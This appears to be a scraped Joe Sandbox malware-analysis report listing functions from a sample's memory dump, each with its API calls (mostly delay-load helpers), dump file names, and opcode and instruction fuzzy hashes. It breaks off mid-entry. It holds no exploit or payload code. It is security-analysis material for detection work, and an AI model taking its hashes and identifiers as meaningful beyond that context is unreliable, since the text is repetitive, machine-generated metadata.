                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: c36ffd1972e027ec3830ed57ebd1176de71dfda62b11650ad2cea136c299ffa1
                                                                                                                                                      • Instruction ID: de102d5479c59f4917c0dfc9f5804fa93da5ce11ddf25f373907f61b8201ccf0
                                                                                                                                                      • Opcode Fuzzy Hash: c36ffd1972e027ec3830ed57ebd1176de71dfda62b11650ad2cea136c299ffa1
                                                                                                                                                      • Instruction Fuzzy Hash: 6AB0129D36D201BC318461141E02E3E012CE1C9F20330C71AF404C2041D4400C4C0131
                                                                                                                                                      Function 00A32226 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?), ref: 00A32233
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1611563598-0
                                                                                                                                                      • Opcode ID: 398e35e26515307476ab0dabdc7aac1ba287c33274b7ff1b6e7d84a0488345d5
                                                                                                                                                      • Instruction ID: b5756dbc3037c7162f43616cbe6f0b0d3522ab2a86195efb80cc0c8e4d96a12a
                                                                                                                                                      • Opcode Fuzzy Hash: 398e35e26515307476ab0dabdc7aac1ba287c33274b7ff1b6e7d84a0488345d5
                                                                                                                                                      • Instruction Fuzzy Hash: 1FC04870201300EFC704CFA9DA8CA0B77AABFA2716B418468F540CB064C734DD61DB25
                                                                                                                                                      Function 00A449B2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: a3b44ebd8a5f742dbd88d7464da5145ba4d1327c89cc4c3d57fc42fb8094b270
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: a3b44ebd8a5f742dbd88d7464da5145ba4d1327c89cc4c3d57fc42fb8094b270
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      Function 00A449E4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 4172cf74f5c969e5cd241c7319b89e924c5578e7b54108dce0fe0d0799b39968
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 4172cf74f5c969e5cd241c7319b89e924c5578e7b54108dce0fe0d0799b39968
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      Function 00A449EE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 0f8e982d41c802015e16115d081a955370ca6379c6e711d727353dfd1af558bd
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 0f8e982d41c802015e16115d081a955370ca6379c6e711d727353dfd1af558bd
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      Function 00A449F8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ed2337cb3c5f5217ec642b50c9ad427526ee177b1cb2c7d20353688513c5c8a3
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: ed2337cb3c5f5217ec642b50c9ad427526ee177b1cb2c7d20353688513c5c8a3
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      Function 00A449D0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 27da4139c95eee90ea48259bca65472ea65e416b999f0140983104ddaff8312f
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 27da4139c95eee90ea48259bca65472ea65e416b999f0140983104ddaff8312f
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      Function 00A44976 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 9758abd00dbe907be583ad80c1d4bc569505a28b18d8f6d1dcbb6d29c724186f
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 9758abd00dbe907be583ad80c1d4bc569505a28b18d8f6d1dcbb6d29c724186f
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      Function 00A44A02 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 48491e77235640a454b788b7a9b26417924b5be52714ed18044929402445f89e
                                                                                                                                                      • Instruction ID: 4bc95fb39ca40af24769076f15080e9e7b56e57e3f0a1395f2a259e98491070b
                                                                                                                                                      • Opcode Fuzzy Hash: 48491e77235640a454b788b7a9b26417924b5be52714ed18044929402445f89e
                                                                                                                                                      • Instruction Fuzzy Hash: C7A001AA6AD122BC320862717E16E7B022DE5C9FA57318E1AF412C5482A8819D892031
                                                                                                                                                      Function 00A44B85 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: f330d5310b3218f8d6dbb787d2641ecf7d89d71bba88b7645ab4480de839191f
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: f330d5310b3218f8d6dbb787d2641ecf7d89d71bba88b7645ab4480de839191f
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      Function 00A44B2E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ece1b2d6b5e0d8bbf6372fc58b9d9f9daef603e78f88f0a3a8396b9e4457d453
                                                                                                                                                      • Instruction ID: 0939ebdf74b678cadc663b631ca3cd6a948cd43a8033c9d10f194bea5fbc448e
                                                                                                                                                      • Opcode Fuzzy Hash: ece1b2d6b5e0d8bbf6372fc58b9d9f9daef603e78f88f0a3a8396b9e4457d453
                                                                                                                                                      • Instruction Fuzzy Hash: E2A001AA2AD221BC71086266AE17E7B122DE9D9F25331AA1AF401D508AA890598A1031
                                                                                                                                                      Function 00A44B71 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: bff03fef8e26b907dfb3a94bb0214e199fdb6386651b3a5d32cb651aa337046f
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: bff03fef8e26b907dfb3a94bb0214e199fdb6386651b3a5d32cb651aa337046f
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      Function 00A44B7B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: f6987ce8f8089e16740f21caa0e678c595cfd59ac4c81cd00f5821f37a5dc32b
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
                                                                                                                                                      • Opcode Fuzzy Hash: f6987ce8f8089e16740f21caa0e678c595cfd59ac4c81cd00f5821f37a5dc32b
                                                                                                                                                      • Instruction Fuzzy Hash: B6A001AA2AD222BC71086266AE17E7B122DE5C9F65331AA1AF402C508AA880588A1031
                                                                                                                                                      Function 00A44B49 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 5b69933f11ce3ce3d3ad38b72ecff7b663d909833c2123c5e08e477074d3170b
                                                                                                                                                      • Instruction ID: 0cdb040419a520facea5180214b2b5665457259583b18ef9660d9ae8a76b42b9
